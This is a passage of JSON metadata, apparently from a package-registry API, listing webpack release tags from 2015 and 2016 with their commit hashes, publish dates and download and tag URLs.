ebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b